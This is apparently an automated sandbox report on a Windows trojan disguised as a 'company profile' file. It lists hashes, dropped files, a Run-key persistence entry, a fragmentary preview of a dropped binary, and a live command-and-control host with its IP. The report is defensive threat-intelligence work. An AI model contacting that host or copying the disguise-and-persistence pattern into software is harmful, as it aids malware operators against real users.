This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
COMPANY PROFILE AND DOCUMENTED OFFER.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\sjZXfoyePbSa.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
14.2.dhcpmon.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cnM	0%	Avira URL Cloud	safe
hailongfvt.zapto.org	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.founder.com.cn/cnG	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fontbureau.comoH	0%	Avira URL Cloud	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.founder.com.cn/cnr	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.coma	0%	URL Reputation	safe
http://www.sajatypeworks.coma	0%	URL Reputation	safe
http://www.sajatypeworks.coma	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hailongfvt.zapto.org	185.140.53.139	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
	true	Avira URL Cloud: safe	low
hailongfvt.zapto.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnM	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.650357997.0000000005DF6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.tiro.com	dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnG	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.650357997.0000000005DF6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.647611607.0000000005DF3000.00000004.00000001.sdmp, COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.650357997.0000000005DF6000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.fonts.comic	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.648445406.0000000005E0B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comoH	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677423373.0000000005DF0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.monotype.	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.652891462.0000000005E2D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comm	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677423373.0000000005DF0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnr	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.649882095.0000000005DFD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.ascendercorp.com/typedesigners.html	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.652015213.0000000005E2D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.com	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.coma	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.647611607.0000000005DF3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.140.53.139	unknown	Sweden		209623	DAVID_CRAIGGG	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356446
Start date:	23.02.2021
Start time:	08:04:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	COMPANY PROFILE AND DOCUMENTED OFFER.scr (renamed file extension from scr to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@12/12@18/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.3% (good quality ratio 0.3%) Quality average: 57.5% Quality standard deviation: 17.1%
HCA Information:	Successful, ratio: 92% Number of executed functions: 73 Number of non-executed functions: 8
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 168.61.161.212, 92.122.145.220, 104.42.151.234, 51.104.139.180, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:04:55	API Interceptor	948x Sleep call for process: COMPANY PROFILE AND DOCUMENTED OFFER.exe modified
08:05:03	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
08:05:15	API Interceptor	2x Sleep call for process: dhcpmon.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.140.53.139	Quotation ATB-PR28500KINH.exe	Get hash	malicious	Browse
	Quotation ATB-PR28500KINH.exe	Get hash	malicious	Browse
	RFQ-BOHB-SS-FD6L4.exe	Get hash	malicious	Browse
	PURCHASE_FABRICS_APPAREL_100%_COOTON.exe	Get hash	malicious	Browse
	GT-082568-HSO-280820.DOCX.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DAVID_CRAIGGG	Attached file.exe	Get hash	malicious	Browse	185.244.30.113
	UNiOOhIN3e.exe	Get hash	malicious	Browse	185.244.30.241
	BzRmS2LLnB.exe	Get hash	malicious	Browse	91.193.75.94
	bDbA5Bf1k2.exe	Get hash	malicious	Browse	91.193.75.94
	SecuriteInfo.com.BehavesLike.Win32.Generic.dc.exe	Get hash	malicious	Browse	91.193.75.197
	Recibo del env#U00c3o.exe	Get hash	malicious	Browse	91.193.75.17
	Revised Order 193-002.doc	Get hash	malicious	Browse	91.193.75.197
	ynS1BQTyzO.exe	Get hash	malicious	Browse	91.193.75.252
	Quote RF-E79-STD-2021-087.xlsx	Get hash	malicious	Browse	91.193.75.252
	PO57891255564GYH11192643-2152021,pdf.exe	Get hash	malicious	Browse	185.140.53.136
	Attachment.exe	Get hash	malicious	Browse	185.244.30.113
	Query_Ref_CSQ5429996-dtd_0202102021-pdf.jar	Get hash	malicious	Browse	185.244.30.187
	Query_Ref_CSQ5429996-dtd_0202102021-pdf.jar	Get hash	malicious	Browse	185.244.30.187
	DHL_6368638172 receipt document,pdf.exe	Get hash	malicious	Browse	185.140.53.130
	47432000083600.xlsx	Get hash	malicious	Browse	185.244.30.21
	Belegbeleg DHL_119040, pdf.exe	Get hash	malicious	Browse	185.140.53.133
	Purchase Order - 582596.exe	Get hash	malicious	Browse	185.140.53.148
	t1OZOPCkTu.exe	Get hash	malicious	Browse	91.193.75.252
	Ref-Number_MT10300238402293.exe	Get hash	malicious	Browse	185.140.53.134
	Quotation_REF19117030.xlsx	Get hash	malicious	Browse	91.193.75.252

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	520704
Entropy (8bit):	7.472589051984974
Encrypted:	false
SSDEEP:	12288:X9ZObojf4hfvrauupl3CE3aXqoFTxWv0wIG6:PObaGeuuphCE3aXqopYvxIG6
MD5:	589F3EDCF4BCCADDE074ACC68279CAB1
SHA1:	C25F51FB32448D6323344CB2A07771A3908BF682
SHA-256:	F22D8DE0260841FBA148D55CE317AC6A8C27EF46A6CCFB6AD7390EEFE3D463BB
SHA-512:	4770B38D61F52AC3EFDE5C3F01E80C9556DABA3B663ED836B421D69BF244048A5468DB5F40374FABCE900201B445C4EC438CE9DDFEC56AF93B6634B0DE0F7042
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7[4`..............P.............N.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................0.......H........x..tS...............0...........................................0............(....(..........(.....o .........................(!......("......(#......($......(%....N..(....o....(&....&..('.....s(........s)........s........s+........s,............0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+...0......

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\COMPANY PROFILE AND DOCUMENTED OFFER.exe.log Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\tmp66DE.tmp Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1645
Entropy (8bit):	5.1820753864715225
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGXItn:cbhK79lNQR/rydbz9I3YODOLNdq3l
MD5:	71FF5915210A631F190918E17AAB2BA3
SHA1:	D686501213D6021737874A2AABE17130FDB70BFC
SHA-256:	AB03E4461B1F19AD17C0D06CED6BAAEE7F85F4C2EFC263C61FB9B58208652460
SHA-512:	9E424DE335F59054FBEB68D0EB569437D08B0FD2FE80D54FCB4C373038EA809EEC8F7218A5665A098D3AFF29E94DB7DF315433AC565ACF5D914E8601263FDF62
Malicious:	true
Reputation:	low
